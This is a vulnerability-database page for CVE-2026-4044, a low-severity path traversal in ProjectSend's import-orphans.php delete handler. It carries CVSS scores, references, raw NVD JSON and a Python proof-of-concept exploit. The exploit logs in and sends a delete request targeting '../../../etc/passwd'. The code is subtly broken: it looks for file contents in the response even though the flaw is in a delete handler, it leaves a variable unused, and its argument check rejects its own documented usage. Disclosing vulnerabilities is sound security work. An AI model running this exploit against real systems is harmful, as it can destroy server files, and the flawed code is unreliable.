CVE-2026-4044

Description

A vulnerability was detected in projectsend up to r1945. This affects the function realpath of the file /import-orphans.php of the component Delete Handler. Performing a manipulation of the argument files[] results in path traversal. Remote exploitation of the attack is possible. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

3.8

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

ProjectSend < r1945

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2026-4044 PoC - ProjectSend Path Traversal in Delete Handler
# Target: ProjectSend <= r1945
# Component: /import-orphans.php, Delete Handler
# Vulnerability: Path traversal via files[] parameter

def exploit_path_traversal(target_url, username, password):
    """
    Exploit for CVE-2026-4044 - Path Traversal in ProjectSend
    
    Args:
        target_url: Base URL of vulnerable ProjectSend instance
        username: Valid high-privilege username
        password: Password for the account
    """
    session = requests.Session()
    
    # Step 1: Login to get authenticated session
    login_url = f"{target_url}/login.php"
    login_data = {
        'username': username,
        'password': password
    }
    
    try:
        login_response = session.post(login_url, data=login_data, timeout=10)
        if 'logout' not in login_response.text.lower():
            print("[-] Login failed - check credentials")
            return False
        print("[+] Login successful")
        
        # Step 2: Send malicious request with path traversal payload
        exploit_url = f"{target_url}/import-orphans.php"
        
        # Path traversal payload - attempts to access parent directories
        # This example attempts to reference ../../../etc/passwd
        files_data = [
            ('files[]', ('../../../etc/passwd', '', 'text/plain'))
        ]
        
        exploit_data = {
            'action': 'delete',
            'files[]': '../../../etc/passwd'
        }
        
        exploit_response = session.post(
            exploit_url,
            data=exploit_data,
            timeout=10
        )
        
        print(f"[*] Exploit request sent to {exploit_url}")
        print(f"[*] Response status: {exploit_response.status_code}")
        
        # Step 3: Analyze response for successful exploitation
        if exploit_response.status_code == 200:
            if 'passwd' in exploit_response.text or 'root:' in exploit_response.text:
                print("[!] VULNERABLE - Path traversal confirmed")
                return True
            else:
                print("[-] Path traversal not confirmed in response")
        
        return False
        
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 5:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>")
        print(f"Example: python {sys.argv[0]} http://target.com admin password")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    
    exploit_path_traversal(target, user, pwd)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4044
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4044
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4044/
[4] VulDB https://vuldb.com/cve/CVE-2026-4044
[5] https://drive.google.com/file/d/1BOWm9FvhmM90oP91rOWpI4GoWdbI06wg/view?usp=sharing
[6] https://vuldb.com/?ctiid.350656
[7] https://vuldb.com/?id.350656
[8] https://vuldb.com/?submit.769528

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4044", "sourceIdentifier": "[email protected]", "published": "2026-03-12T16:16:11.863", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in projectsend up to r1945. This affects the function realpath of the file /import-orphans.php of the component Delete Handler. Performing a manipulation of the argument files[] results in path traversal. Remote exploitation of the attack is possible. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Una vulnerabilidad fue detectada en projectsend hasta r1945. Esto afecta a la función realpath del archivo /import-orphans.PHP del componente Gestor de Eliminación. Realizar una manipulación del argumento files[] resulta en salto de ruta. Es posible la explotación remota del ataque. El exploit es ahora público y puede ser utilizado. El proveedor fue contactado tempranamente sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:L", "baseScore": 3.8, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 2.5}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:N/I:P/A:P", "baseScore": 4.7, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 4.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://drive.google.com/file/d/1BOWm9FvhmM90oP91rOWpI4GoWdbI06wg/view?usp=sharing", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.350656", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.350656", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.769528", "source": "[email protected]"}]}}